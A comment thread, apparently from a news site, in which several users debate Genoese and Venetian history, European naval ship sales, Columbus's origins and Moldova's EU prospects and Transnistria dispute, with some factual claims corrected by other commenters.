The Venetians wound up in Brazil as a confluence of two factors: the first was the liberation of the slaves in the 1860's, which left the Portuguese at around 15% of the country - so that their leadership was eager to import European labour to avoid being overwhelmed racially; the second was the Genoese industrial victory over Venice, which was pushing many Venetians out of work, looking for places abroad (many moved to their former Adriatic colonies, at that time under Austrian Hapsburg rule, and many moved to Brazil).

Actually, we always said in Italy that the Venetian language was closer to Castilian (hence the "calle" of Venice), Friulian is closer to Catalan (with its "peraulis") and Genoese (or Zeneixe, since we Genoese call our city "Zena") closer to Portuguese. The Portuguese Navy, the world's oldest, was founded by a Genoese captain - and many residents of Madeira are of Genoese descent.

BTW, Pope Ratzinger is apparently in love with Christian Orthodox history - and Genoa's medieval role/alliance with those lands. He has proclaimed his support for the unification of the Eastern/Western churches and the partial renunciation of Papal Infallibility; and he has nominated ultra-conservative Genoese archbishops to all the important Curial positions - including, as of January this year, the Archbishop/Patriarch of Venice (Ha! The first time ever in history - Genoa wins again!), Francesco Moraglia. Ratzinger is also very clearly (successfully?) preparing Cardinal Bagnasco of Genoa to succeed him as Pope. (Being an atheist, I refer to him as General Bagnasco, since he also carries the rank of four-star general as Italy's former Military Chaplain.) Ratzinger apparently believes there is enough history and skill in the Genoese church to manage both unification with the Orthodox and fending off the Muslim challenge.

As for your final comment: I grew up in North America - Ontario, Michigan, Maryland and Virginia/DC.
I am a "colonial" Italian - and my grandmother was a pillar of what was called the "Colonia Italiana" until WWII. Our Genoese traditions survive... and in fact, with Berlusconi having utterly discredited the Guelph leadership of postwar Christian Democrat Italy, we are preparing for a return to our former influence as important leaders of Ghibelline Italy. For 200 years, Moldovan trade was closely tied to Genoese trade through Constantinople. Ours were the closest relations Moldova had to Italy since Roman times. Our lobby in Italy is not going to forget about Moldova, especially if Bagnasco becomes Pope and brings forward Ratzinger's project of unification with the Orthodox Churches. That would unite both Ghibelline and Guelph Liguria with regard to a new "Ostpolitik". BTW, does this sound like ancient, irrelevant history? Check out the history of Genoese Mayor Marco Doria's family: Try reading the various entries in all the languages - such as Portuguese to see about their descendants in Brazil. Outdated junk? ;-) Once again, Forlana, you underestimate Genoa. 1) Virtually all Italian warships are built in Genoa/Liguria - Voltri, Riva Trigoso (Sestri Levante) and Muggiano (La Spezia). We beat Venice out during the Risorgimento, remember? Venetian shipbuilding got closed down in favour of Genoa. 2) Italian military shipbuilding is the descendant of Genoese shipbuilding - a thousand-year-old tradition. We have not ever built "junk", Forlana. 3) Just as an historical note, perhaps your opinion of the Italian Navy is influenced by WWII. Allow me to explain to you that our navy was the world's fourth largest at the beginning of the war: but it had a preponderance of Genoese and Neapolitan officers - every last man of whom spoke English. Our navy had no desire to fight against what they considered their long-standing allies. (The Italian Empire in Africa had also been built in partnership with the British). 
4) Although hobbled by our defeat in WWII and our (imposed but popularly-accepted) renunciation of nuclear weapons and ships, Genoese military shipbuilding is second to none in the world today. Please check out the websites of Fincantieri and Oto Melara. For example, the Oto Melara 76 mm gun is the world's most popular naval cannon - used by 53 navies around the world on over 1000 military ships. Notice that the Genoese/Italian gun is also used on Poland's flagship(s), the Oliver Perry class frigates. Which brings me to my next point: 5) Unloading junk on the Black Sea? As opposed to the Americans unloading their Oliver Perry ships on Poland? ORP Generał Kazimierz Pułaski and ORP Generał Tadeusz Kościuszko are two ships launched in 1978 and 1979, displacing only 3,600 tonnes. The ships we are putting up for sale are all from the 1980's - and better than Poland's for their performance, achieving for example speeds of 33 knots rather than the 29 knots of the American ships. Those ships of ours would be more useful in Romanian and Bulgarian hands, where they would be perfect for use in the Black Sea. Let's not forget that the Romanian Navy's FLAGSHIP is the former British HMS Coventry, displacing 4,600 tonnes and originally launched in 1988 (they have two such ships; everything else is older or much smaller) and the Bulgarian FLAGSHIP is a former Belgian destroyer displacing 2,200 tonnes launched in 1978 (they have three such ships; everything else is older or much smaller). So, the current state of affairs in Europe is that Italy would be accused of "putting her outdated junk on the Black Sea to secure her interests" by suggesting NATO give a hand to transfer these ships from us to them. This is because a) they haven't got the money to purchase the ships, and b) we need the money from selling the ships and cannot afford to give them away for free. Excellent.
For these reasons, the Italian Navy has announced that negotiations are under way to sell these ships to the Philippines or Perù. God forbid we were to actually cooperate on defence matters in Europe... And tell me Forlana, if Romania and Bulgaria encounter problems with the Russian Black Sea Fleet, who will be called upon to send ships to support NATO "forces" in the Black Sea? Poland, with its puny, outdated navy? Germany? Do you think the Americans are about to take on another burden in the Black Sea? Did you know that by international convention, any warship over 15,000 tonnes may only cross the Bosphorus with Turkish approval? France and Italy's new super-modern FREMM frigates, at 6,000 tonnes, pack more firepower than many much larger ships - including those of the Russian navy. If France and/or Italy deploy two of these frigates to the Black Sea, it changes the naval balance of power there. Except that France has signed an agreement to build four helicopter carriers of around 20,000 tonnes for the Russian Navy. Which has greatly upset the Romanians. I somehow doubt the French navy will be sending ships into the Black Sea anytime soon, to challenge Russia potentially. Or that the Romanians have any desire to purchase French ships. Once again, God forbid we should actually cooperate on defence matters in Europe. My original point was only meant to suggest that it would be much more intelligent and useful to keep those excellent ships within allied European hands. There is also the question of our ex-flagship the Giuseppe Garibaldi, which is the world's smallest aircraft carrier. It will be de-commissioned within 5 years or so, having been launched in 1984. It has been a particularly useful and inexpensive ship to operate, packing 18 vertical take-off Harrier fighters and other helicopters. During the recent Libyan War, some 300 sorties were flown from its deck. Should such a useful ship also go to South America or Asia, or stay in Europe? 
Caro signore, You're welcome. I take your point. This is always a problem and depends on the context. If someone says that Sigmund Freud was born at Pribor in Czechoslovakia (until 1993) or the Czech Republic now, this is somewhat misleading, since in 1856 this was Freiberg in Mähren (Moravia), which was a part of the Austrian Empire. There were people who said that he was born in the Austro-Hungarian Empire, which is equally untrue because that empire was created in 1867, &c. The balance of power between the Crown of Castile and the Crown of Aragon was really difficult for the Aragonese, since there was a 5 : 1 population ratio. As for "castellano", Castilian, as a synonym of Spanish, this is totally wrong, of course, and forgets the other nations, peoples, cultures and languages of Spain. Even the Spanish Constitution refers to castellano (Castilian), not "español" (Spanish) language, and many people still do, especially in Catalonia. There are no "British" or "Belgian" languages, just English, Welsh, French, Dutch, German, etc. This could apply to Italy and other countries as well. Bear in mind that King Ferdinand II of Aragon was the model or one of the models for your compatriot Niccolò Machiavelli's 'The Prince', and Queen Isabella I outfoxed him several times... "Soziglia"? in Genoese? But for the sake of the other posters who don't know that language (or dialect?) perhaps you should point out that in Italian (Tuscan dialect if you prefer) it's Siviglia, like in Rossini's 'Il barbiere di Siviglia'. Thank you for the interesting information concerning Genoa and Venice. "The Portuguese Navy, the world's oldest"—No, I don't think so. Slavery in Brazil was not abolished in the 1860s, but in 1888, the main reason why the Empire of Brazil fell a year later and a republic was proclaimed. No history "sounds like ancient, irrelevant history" to me, don't worry about that. And the Dorias... Jesuits have a general as well. A general commanding a company... strange.
As for Cardinal Bagnasco, if he is elected pope after Ratzinger and Saint Malachy's famous Prophecy of the Popes were right, he would be the 268th of the list. Both Bagnasco and Mario Monti were born in 1943, a key year in the history of Italy in the 20th century, as you know well. I meant thou... Genoa, Ontario, Michigan, Maryland, Virginia/DC, Trieste... Hey, your life reminds me of my own life! Hello Joe Milovan! :) I am not sure why you think that I underestimate the role of R.o.Genova in history, your -historically- great neighbours, mio caro amico Veneziano. I am not sure why you think I am unaware that Italy is capable of crafting advanced and precise weapons. We have many Italians hunting for European bison (żubr) in our primeval forests of Puszcza Białowieska, with their Beretta rifles, I hope that's the name. Good stuff, I've been told. I have no idea why you mention here the indeed out-dated and puny Polish navy. Did anyone propose that we 'sell our junk to NATO', so it can be placed on the drying Azov Sea, where it would be indeed more adjusted in size to the extent of the water-basin? Well, I can say Poland and Italy are in exactly the same position! Poland would like to strengthen Romania's fleet on the Black Sea, at least I hope she would, but unfortunately she does not have the money. But don't underestimate Poland's role in history, Joe! Ciao and it's always a pleasure :) Joe.... I did the crazy thing and checked those Polish ships you mention... Please, please be precise and truthful when you cite data. The ships served in the US Navy from 1980 to 2000 and 2002. And they were given FOR FREE to Poland by the US. You see the difference? You propose that old Italian ships are 'kept in Europe' if somebody is to pay you for that. Do you now understand why half of Europe thinks you are not especially talented in warfare, geopolitics and such stuff? But you ARE extremely talented in artistic crafts, including money-earning... Let it stay like that.
And take cum g. sal. my wide-brush, rhetorical stereotyping, please! :) One more example Joe! Have you heard about Leopard tanks serving in the Polish army side by side with our Twardy and T-seventy-something? Exactly the same issue as with your outdated junk ships :) Did those 'rigid' GermanZ 'sell it to NATO' to strengthen the Eastern flank? No, they gave it for free. See the difference, now? Hey! I was not untruthful - I wrote that the ships were launched in 1978 - go check the dates. Actually, I was unaware this materiel had been gifted. It's possible however that NATO paid the US or Germany something for this gift. Still, interesting... No, I am a big fan of Polish history - as you know ;-) and I don't underestimate the role of Poland. And, BTW, yes we are especially talented in warfare, geopolitics and the like. Take into consideration just how defeated we were in 1945 - and just how much we have re-built our international prestige... OK, hard to do that in the aftermath of Berlusconi, I admit ;-) Still, we have achieved a President of the ECB - many executives at the IMF and the World Bank, an Under-Secretary General of the UN (Giandomenico Picco) a Secretary General of NATO, leadership of the Central European Initiative, a strong leadership position at UNESCO (World Heritage Programme), the FAO in Rome, etc. etc. - not bad for a country that was utterly humiliated, defeated and occupied a few short decades ago. As for geopolitics - we have no enemies today - what better defence of a country's diplomacy and geopolitics can there be? No, we cannot afford to gift the ships now. Especially since they are worth something. On the other hand, 200 million would keep the new FREMM deployments moving forward - but let's not forget the Italian federal budget is over €510 billion this year. You accuse me of seeking to make a profit? And besides, we are speaking of 20 warships up for sale - not two. Quite possibly, the US and Germany felt they owed Poland something.
Gifting ships and tanks is not a normal practise, you know? As for living in ex-Venetian lands ;-) We Genoese and Venetians have always lived side by side. We are "two peas in a pod" - and besides, it was always a good idea to keep a close eye on what the other rival was doing. Rest assured that there were a few Venetians on those ships Columbus set out on - it was the nature of the game. Just as there were Genoese somewhere in Marco Polo's caravan across Asia. Did you know that here in the Venezia-Giulia (Trieste and Gorizia) they refer to World War I - between Italy and Austria-Hungary - as the "Last War Between Genoa and Venice"? Hapsburg naval power derived from its control of the ex-Venetian territories - while "Italian" naval power was basically Genoa's. The Italians around Istria and Dalmatia typically favoured Venetian dialect to proper Italian (Tuscan) and never admitted they were giving up their loyalty to Venice - just that they did not recognise themselves in the Savoyard State of Turin. Anyway... So what do we do about Moldova? And Russian military power in Transnistria? I realise the Germans, Finns, etc. would hardly be enthusiastic about EU expansion - but I have long been convinced Moldova should join Romania as a semi-autonomous province (like Friuli-Venezia Giulia here) and Macedonia should join Bulgaria as a semi-autonomous province. This would put both peoples inside the EU immediately - and without waiting for approval from 28 other countries. Does anyone think independent Moldova or Macedonia is ever going to enter the EU on their own? And let's face it, EU membership would mean a lot of cash heading into both Chisinau and Skopje... Thanks for the correction on Brazilian slavery - I was thinking of Russia's abolition of serfdom. If you have any taste for Papal intrigue, try reading up on the "Siri Thesis".
It sounds like only more idle chatter regarding the Vatican - until you discover that all of the Genoese prelates Ratzinger has nominated were disciples of Siri's - and typically ordained by Siri. It seems Ratzi was a big conservative ally - and together with a few other key conservatives from Austria and France, had sponsored the elevation of Wojtyla to the throne to put down the Jesuit rebellion and throw out the liberals sponsored by Paul VI and John XXIII. On the Portuguese Navy - well, that's what they say. "The Portuguese Navy, tracing back to the 12th century, is the oldest continuously serving navy in the world." "In 1317 King Denis of Portugal decided to give, for the first time, a permanent organization to the Royal Navy, contracting Manuel Pessanha of Genoa to be the first Admiral of the Kingdom." (from Wikipedia). I can only find a handful of "Pessagno" families in the phone books of Liguria. I think it more likely that the surname was "Bisagno" but got twisted while travelling abroad in other languages. Where do you live, btw? And how are you so knowledgeable about Spanish history? So, I pose the question to you: what should be done about Moldova? The people do not deserve their current plight and should be helped. You're welcome. Mind, considering your output the number of your lapses or incorrections is really minimal! Thank you, I wrote down that title, I might read it when Petrus Romanus is pope. The Armada Portuguesa, the Portuguese Navy, for which I feel a lot of sympathy, by the way. Well, if you had added "oldest continuously serving navy in the world."... but you just wrote "the world's oldest". Anyway, I recently had to mention this on two threads concerning the Liaoning, the first Chinese aircraft carrier: "The Chinese Imperial Navy came into existence from 1132 during the Song Dynasty to the end of the Qing period in 1912. Prior to 12th century, Chinese naval ships were not organized into a uniform force.
After 1911, it was replaced by the Republic of China Navy and then the People's Liberation Army Navy after 1949." By the way, I know about naval history and naval matters and I read your reply to Forlana Dec 16th, 18:42 with interest, trying to detect some error ;-) but you are knowledgeable and tough, Joe! Ah, I recently posted this, you might like to take a look. It's about Georgia: Laconophile, Dec 4th, 21:08: "What a beautiful flag. It's a shame St. George hasn't been as kind to Georgia as he has been to England." Accrux in reply to Laconophile, Dec 4th, 23:28: "old flag of Sardinia,..." --------------- I answer your questions: I have spent most of my life in—in no particular order—France, Spain and the United Kingdom, my three main countries. A few years in Belgium and Italy as well (I have Belgian—Walloon—relatives, but alas, not Italian ones). Plus Marshovia and Carpathia, of course. Quite a European, as you can see. I know about history (not only Spanish) because I studied History (European and modern) at university and have read, researched a little and written a few modest things as well, mostly unpublished. Especially Spanish, British, French, Italian, German, Austrian and Russian history, 1453-1945. American (USA) and Roman and ancient Greek history too, of course, and other countries and periods as well, but just reading, as a hobby. Curiosity satisfied? "So, I pose the question to you: what should be done about Moldova? The people do not deserve their current plight and should be helped." To HELP Moldova, a proud European country, as much as possible, with money, technology and whatever they may need. To be really generous, but without being overbearing or patronizing. I checked the links and the third one doesn't work, my fault. (I know it changed in the late 1990s) By the way, "Incorrections" is not the right word, I meant to say errors, mistakes.
Joe Milovan, by saying 'don't underestimate Poland's history' I simply meant that past great history of any country, including Genova, Venezia, Italy, Poland or Sokoto Caliphate does not really per se help solving problems of today. What do we do about Moldova? Well I am a bit intimidated to say, since Trieste has already made public it is so near the place :-) :-* "There is also the question of our ex-flagship the Giuseppe Garibaldi, which is the world's smallest aircraft carrier." -------------------- I had missed this, and to keep my job as Nitpicker-General of the Thread, I must say that the Royal Thai Navy's HTMS Chakri Naruebet is even smaller. She ("it" for you) has problems with her aircraft, but she's still there. "Chakri Naruebet is the smallest aircraft carrier in operation in the world. She displaces 11,486 tons at full load." (Wikipedia). Take a look at her and the old USS Kitty Hawk CV 63. "All aircraft carriers are equal but some aircraft carriers are more equal than others" ;-) Don't think that I spent time looking it up at Jane's or Google, I knew one of the Spanish engineers who built it in the 1990s at Empresa Nacional Bazán (now Navantia) at Ferrol (once "El Ferrol del Caudillo", because Franco was born there...), in Spain, and he mentioned this several times. ------------------------- These Genoese... One of them, Cristoforo Colombo, seduced or outfoxed Queen Isabella I the Catholic of Castile (not an easy task!) and discovered America in 1492, but he thought it was Asia... ;-) "No, I am a big fan of Polish history - as you know ;-) and I don't underestimate the role of Poland." ------------------------ Have you visited any of these Polish war cemeteries in Italy? San Lazzaro, near Bologna (1432 soldiers) Casamassina (430 soldiers) Loreto (1081 soldiers) Monte Cassino (1072 soldiers) Thousands of Poles 'became' Italians as well by right of death in less than two years... :-) Well, it was an easy task for him... being half-Polish ;)......
Colombowicz! Fascinating, I had missed this. Thank you. I wonder what some Genoese people I know will say about this... By the way, in case you read one of my posts here I would like to say that I "forgot" to add four countries to the already long list: Sweden, Poland, Portugal and Hungary. What about the other half? Interesting info - I hadn't seen the Thai carrier. Perhaps some sources I had seen didn't classify her as an "aircraft" carrier - but only as a helicopter carrier? The Harrier VTOL jet sort of confuses the distinction. Amazing - wiki says the ship was built in the 90's for only USD 336 million. A true bargain. One would think the Spanish would be able to export more of them. I think we are in a bit of a fix here over the Garibaldi. The 30,000-tonne Cavour was supposed to be its replacement, but it is currently too costly to deploy - and during the Libyan intervention was kept at home in favour of the cheaper-to-operate Garibaldi. The truth is that we probably need another pocket-sized carrier to replace it. "Have you visited any of these Polish war cemeteries in Italy?" I have one part of my maternal family from right near Monte Cassino - first visited the site in July 1986 - only two months after having visited Auschwitz. I was suitably moved, thinking of how many were dying in Polish death camps while they were fighting also to liberate our country. I also visited the Loreto cemetery in 1992. I drove past the San Lazzaro cemetery in '99, without really stopping. Didn't know about Casamassina though - and I have never visited Apulia. I speak a fair bit of Polish, having studied in the country in the '80's. Forlana and I go back and forth like an old married couple, don't we? Her Italian is quite good, btw.
I would tone down my bragging with her, but this new-found Polish (and typically Varsovian) arrogance, buying into all the rubbish northern-European propaganda about Italy-as-a-PIG-country is being experienced as a sort of betrayal here in the peninsula. Our companies are beginning to pull out of Poland, claiming that "Poland is being sewn up by the German industrial lobby - and is now hostile to Italy." I have heard this from three different industrialists in the last 6 months. I would not believe this line - but Forlana's posts on other blogs seem to justify that opinion. You are writing with a Genoese person. Whose family comes from the same valley in Liguria as Columbus's family. Pure Polish poppycock. As is the idea that Columbus was Spanish or Portuguese. All these countries vastly underestimate the completely cosmopolitan nature of Genoese colonialism. We are fairly sure in Genoa that Columbus was NOT born at home in Liguria. One of the most accredited theses is that he was actually born in the Genoese colony of Chios. "I simply meant that past great history of any country, including Genova, Venezia, Italy, Poland or Sokoto Caliphate does not really per se help solving problems of today." In the Balkans? History does not condition EVERYTHING in the Balkans? If there is no Italian connection, there is no Moldova/Romania as we know them - there is only Dacia. I suppose it would be far easier for "Dacia" to choose union with the CIS, no? Funny, but as good linguists as they are, I can always distinguish Polish and Ukrainian accents in Italian. Romanians who come to our country not only reliably learn Italian in one month - they also tend to lose any distinguishable trace of a non-local accent within a few years - much more so than the South Americans, for example. Genoese were granted the right to bear the cross of St. George after the First Crusade, as reward also for making a key contribution to the conquest of Jerusalem.
Actually, the Genoese used the symbol quite cynically in the ensuing centuries - mostly to remind the Christians we were the conquerors of Jerusalem, whenever it became useful as we were signing treaties with the Muslims. The truth is that our sailors were appalled and ashamed at what our "religious brethren" did after we had conquered the city for them. Thus it was that Genoa made an agreement with the crown of England in the 1100's to exchange the right to establish a trading colony in Southampton (together with Bruges, our bases for commerce/intermediation with the Hanseatic League) for the right of English ships to fly our flag in the Mediterranean - thus implying Genoese naval protection on the way to the Holy Land. The bombing of Genoa by the British ships is the date most remembered of WWII in the city. A particular stab in the back not warranted by our city's loyalty to the Brits. For example, I saw some time ago a roster of the ships of the Spanish Armada: one-third of the ships actually came from Spanish possessions or allies in Italy: Naples, Sardinia, Venice, the Papacy, Savoy... but there were no Genoese ships - as the city fathers had told the Spanish Emperor there was no money to contribute to the venture (this, as Genoese bankers were skimming the best part of the profits from South American traffic). The Thai aircraft carrier was and is an aircraft carrier, like the British Invincible class or the Spanish Príncipe de Asturias, now at the end of her life. People referring to them as helicopter carriers didn't know what they were talking about, even when they didn't have jets. The Harriers are jets, not helicopters, as you know well. That's what Bazán (later IZAR, now Navantia), the Spanish equivalent of Fincantieri, thought... and wished. 
The last one they built was a hybrid of aircraft carrier and LHD, exported to Australia. You will like this one: I like very much the Garibaldi and the Cavour, they are much more elegant than the British- and Spanish-built aircraft carriers. Some of the most beautiful battleships ever built were the Littorio class. The fate of the Roma was really sad. What a month of September of 1943! "The bombing of Genoa by the British ships is the date most remembered of WWII in the city. A particular stab in the back not warranted by our city's loyalty to the Brits." --------------- What are you talking about? The ones who stabbed France, and also the United Kingdom, in the back (even FDR said it) on June 10, 1940 were the Italians who declared war on them without any real need, just for GREED, when they thought these two countries had lost the war. Genoa was a part of Italy, which was at war with GB. Bad luck, they should have kept their independent republic. "but this new-found Polish (and typically Varsovian) arrogance," "new-found"? Ah, you should have seen them in the 16th and 17th centuries, with their formidable armies, hussars and the like! Or at Tannenberg in 1410, &c. The Polish winged hussars looked like gods!...... -------------------------- "You are writing with a Genoese person." -------------------------- "Writing with"? Ah, if you hadn't said it now I wouldn't know it... ;-) But tell Forlana and The Daily Telegraph, my friend, don't tell me, the thesis is that Portuguese fellow's, not mine. Don't start with your antitheses-without-theses... Personally, I couldn't care less where Columbus was born or if he was Jewish or Gentile. What I know is that he took information and experience from other people, that he miscalculated the whole thing (the real size of the Earth, for example, which happened to be much larger) and that he thought he had reached Asia sailing westwards... when in fact there was a whole new continent in between!
Thanks to which native Americans were and are called... Indians! (injuns) and there are the French and Indian War, the West Indies and the East Indies, etc. Well, at least we have Jean-Philippe Rameau's beautiful 'Les Indes galantes'... "... they are much more elegant than the British- and Spanish-built aircraft carriers." ----------------- I mean the three carriers of the British Invincible class, the British built beautiful aircraft carriers for many decades. Not much time - unfortunately, spent all I had reading Accrux. Wow, where have you been hiding all that time? :-) Just a couple of extremely serious issues: 1. Sweden, Poland, Portugal and Hungary - if I read your fine posts correctly I at last got it where are Marshovia and Carpathia 2. Daily Mail claims the other half is Portuguese. We can't be sure except that it is established for sure he wasn't Genovese. At least for the needs of this discussion 3. Went to Wiki to read 'Origin theories of Christopher Columbus'. Almost every folk under the sun has a theory that he was one of them. Except Catalan and Polish, such origins were guessed by non-Catalan and non-Polish. So from now on it is established once and forever - Cristòfor Colom/Krzysztof Kolumb was half Catalan and half Polish. 4. Sorry to disappoint Joe but Poles are still fond of Italians. So no excuses for Marchionne's political decisions to run away from Poland with that FIAT of his. Just give us back all the money we have spent for super-duper preferential conditions FIAT had here and you can go assemble the junk near Napoli. 5. Joe, let's take a closer look at the map posted by A. Open? Head right SE to where Hospodarstwo Mołdawskie in light pink resided. Light pink stands for 'lenno' = fiefdom. Those arrogant Varsovians must have been there... Does this fact help solving the problem of today? I doubt it. Times of Dacia are more relevant ;) One more point with the map. See Akerman?
Adam Mickiewicz The Akkerman Steppe (Stepy Akermańskie) I entered the dry waters of an open sea; My carriage like a canoe plunges in the green Deep of flowery meadows and passes between The coral isles of brier and laburnum tree. The dusk falls. Neither barrow nor road can I see. I look up, the stars seeking that could lead my way. A cloud glints in the distance – sign of rising day. Perhaps Akkerman's lantern can show light to me. Let's halt! It is so quiet I can hear the skein Of cranes that flying slowly a hawk's reach surpass, I hear the beetle kissing the drip of the rain, The sleek viper that softly moves among the grass... In this stillness – my ear I so curiously strain A voice from home could reach me – No one calls, alas! --- Best to both of you! I spend much of mine reading Milovan Djilas (almost always a pleasure) and replying to him! I wasn't hiding, it's just that you didn't pay attention... ;-) Where were you? 1. No, Sweden, Poland, Portugal and Hungary are countries whose history I studied with particular interest, along with the others I had already mentioned. Marshovia and Carpathia are small but beautiful countries between the Transylvanian Alps and the Carpathians. Like Brigadoon, not everyone is able to see them. God bless them. 2. Of course, sorry, I just read the first paragraphs of the Daily Telegraph and left the rest of the article to be read later on, but I went to bed and there was no later on... I will do it tonight. 3. Some Catalans claimed that Columbus was Catalan, it's an old story. Colom is not an uncommon family name in Catalonia, I personally met some people with that name. And where did he go when he went back to Europe in 1493? To Barcelona! That proves it! A Catalano-Polish origin is fine as far as I am concerned. 4. No idea. 5. Well, though you address Joe, I ("A.") followed your instructions and took a closer look at the map.
Look at this (you may use this website for free, consider it a Christmas present from me): Wesolych Swiat Bozego Narodzenia! (Merry Christmas!) 1400. 1500. 1600. 1700. Thanks for Mickiewicz's poem. (I know Akkerman because of the Convention, mainly). --- "Best to both of you!" Thank you, but please render unto Caesar the things which are Caesar's, and unto God the things that are God's. Milovan is God, but I am Caesar, DIFFERENT entities... ;-) 0. Agreed. 1/2. I will pay attention from now on but - 1. - please do keep it simple for me. It was a long way. Due to reasons independent of your/my will Brigadoon was an empty sound. But took me to correct times. Viva Lehar by Metro-Goldwyn-Mayer aka Pollywood-... 2&3. NP. And thanks for the fine link with the great sentence "The Catalan roots has the same major weakness as the Italian roots: Columbus never wrote in Catalan and never claimed to be Catalan." 5. Again - thanks for the links. Will look closer later. For now, never show this general view to J. or you will lose a friend 6. Oops. My fault Julius :) 0 & 1/2. OK 3/4. (New). Winter in the Northern Hemisphere starts tomorrow, the 21st, at 12:12 CET (Western, Northern, Southern and Central Europe etc, except the UK, Ireland, Portugal, etc). 12/12/12/12. I wish you a happy Sol Invictus Day. 8/9. (New). If the Mayans or those who interpret the Mayans were right and tomorrow is the end of the world, I wish you (and Milovan and the others) a happy transition from this world to the other world or wherever. 1. Don't believe literally those Lehar/Metro-Goldwyn-Mayer stories, they took advantage of small European countries with no © and referred to them without any respect, inventing things, without even paying them anything. As for Carpathia, a ship was actually named after her, RMS Carpathia, and she actually rescued the survivors of the Titanic. As for Brigadoon, sorry. This is Brigadoon, my dear Forlana, one day every century... From the film (in reality it's even more beautiful).
Ah, the folks with the two Americans!
2 & 3. You're welcome. What is "NP."? Nema Problema? .....
5. I might have lost that friend already (I hope not), but not because of that map. See above, an uppercase five-letter word in one of my posts. But History is History.
6. Tiberius JULIUS Caesar Augustus, of course. Don't get me wrong, if you address Joe in a post sent to me he won't be notified, and if he comes across it and reads it he might think "why didn't she send it to me?" and be jealous. Same thing for me if you address me in a post sent to him. This might lead, at "best", to a Jules et Jim situation, in which you would be Catherine, Joe would be Jim and I would be Jules (Julius for you), and at worst to... Heaven knows what!
NB. If this helped to preserve peace I would accept to be Jim and let Joe be Jules. But honestly, I think it would be better if for the time being we are just Forlana, Milovan and Accrux, because the three of us have a real life and...

Accrux, thanks for the wishes - both for the winter solstice and Christmas. I wholeheartedly return both. More light is badly needed, as is some celebrating with family. Merry Christmas to you and everyone who might read it.

------

NP.: correct, nie ma, nie ma :)
Brigadoon. I will know now! Though when I was in Glasgow, so almost, almost in Edinburgh where the rovin' lad used to know Jo, they sounded different?
Joe? Milovan will not be jealous, he is a very calm Northerner. He prefers little provocations (i.e. Polish camps lately :) to check my patellar reflex, will I kick at once or a little later.
Best to you

Best to you :) Ah, that's 'my' Forlana, the kindhearted one, ma belle polonaise, the one I like! Thanks a lot! But written nema, I think (I am referring to Serbo-Croatian). Thanks again (for the lofs, I mean the laughs). Never be too sure, he's Italian, ain't he? And you are more of a 'northerner' than he is, and so am I in my three fourths. Ah... I think I will check my patellar reflex now...
:-( Thanks, likewise

Thanks, likewise ;-)

Don't tell me, please! The EU thinks that Moldova is a good bet for future membership because it is ''European'': meaning 'Christian'; perhaps meaning 'Aryan/Romance-language-speaking', or possibly ''cultured like us, not like them'' - whoever us and them may be. Surely it should be because it is already a member of the Council of Europe - a fact that extreme nationalists of the French and other types (Gaullists, fascists, and other assorted right-wingers) find hard to understand, what with Guyane and many other American, Asian and African places being also ''European'' as in parts of the so-called ''European'' Union. God forbid, however, should they be labelled ''Muslim''; or maybe ''Moonie''?

Well, they really are like you: Romance language, Christian, white European - that's a serious record. But there is no economic relevance; where is the promised economic transition, and what exactly has Moldova been struggling for? The skepticism is based not on the road to the EU, but on the failures and uncertain reports made by Moldovan governmental staff: there is no such thing as a clear and rational economic strategy, no clear financial division between corporations (which don't actually exist), and no real structure for managing markets. I still don't see the work, just aspirations.

That Moldova is NOT a success story is obvious and no amount of handshaking will change that. First the EU leaders should persuade Putin to withdraw his armed units from Transdnistria and to support a free referendum on this tiny region's future status. The EU has a responsibility to bring an end to this post-Cold War anomaly, a topic carefully avoided by the TE author.

Transdnistria isn't really that important even in Moldova - it's just one seventh of the population, on less than 10% of the territorial area. The priority has to be building good institutions and achieving economic development.
The territorial issue doesn't have to be resolved - a pragmatic short-term workaround would be preferable.

"...a pragmatic short-term workaround would be preferable." Preferable to whom? Would that 'pragmatism' include the evacuation of Russian army units? Not much economic progress can be expected in isolation. Let's not forget that talks involving Moldova, TransDnister, Russia, Ukraine and the OSCE resumed in 2008, and so far got nowhere. Disputes continue over language, dominated by Russian-speakers, even though around half the population use Moldovan, virtually identical to Romanian, as a first language. Even though the region has its own currency, constitution, parliament, flag, etc., it remains a typical bastion of Soviet rhetoric, with plenty of Lenin monuments and armed Russian troops. Russia's annual financial assistance is at the root of the region's corruption, organised crime and smuggling. So much for institution building.

I hear you, Didomyk.

Italy is the closest Romance-language country to both Romania and Moldova (let's leave aside for a moment the old Roman/Dacian dispute regarding Romanian history). And Trieste, where I live, is the closest part of Italy to Moldova: we have many Moldovans in our region (and Albanians and Bulgarians and Romanians, etc.), although there are more women than men coming to live here and marry. (Italian citizens seeking a divorce, without children, must wait at least three years, while if they have children, the proceedings may continue for 5-10 years; FOREIGN citizens however retain the right to divorce according to their own home country's laws - so marriages between Italians (especially men) and non-Italians (especially women) are becoming increasingly common.)
In general, having got over the hump of the first wave of Romanian immigration to our country (now the largest number of foreigners resident in our peninsula, at one million), I would say another, smaller wave of Moldovan immigration does not represent a source of worries for anyone here. (The issue of whether or not there are jobs for ANYONE here is something else... although at the moment, Friuli's unemployment is one of the lowest in southern Europe, at 6%.)

And then, there is the long-running question of the Corridor-Five train and motorway connection between Barcelona and Kiev... which could include, or could have easily included, another connection after Budapest or Miskolc into Romania and perhaps even to Moldova. This project is now dead in the water, due to the economic crisis - but if and when the crisis passes, it may become a new priority. At bottom, Romania was until a short while ago a booming economy - and will soon return to a boom.

In any case, these topics may soon assume new importance in Rome. New elections, now to be held in February, will inevitably lead to the political downfall of Berlusconi - his credibility is absolutely finished here. And that will mean the end of his personalising relations with Russia and Putin through his henchman Paolo Scaroni at ENI. The Left returning to power is not at all as pro-Russian or pro-Putin as Silvio. Being dedicated Europeans, Bersani's camp will pay greater attention to Central Europe (Bersani was Romano Prodi's former Minister of the Economy). Perhaps, just perhaps, that will mean greater interest and engagement in Ukraine. And Moldova.

Thanks for posting that link to the "Corridor 5" route, even though it may be for now 'dead in the water'. Any chance of it being implemented in stages where construction costs would be lower?

Hello! Well - the problem is not just the recession - but mostly the opposition of the environmentalists and Greens.
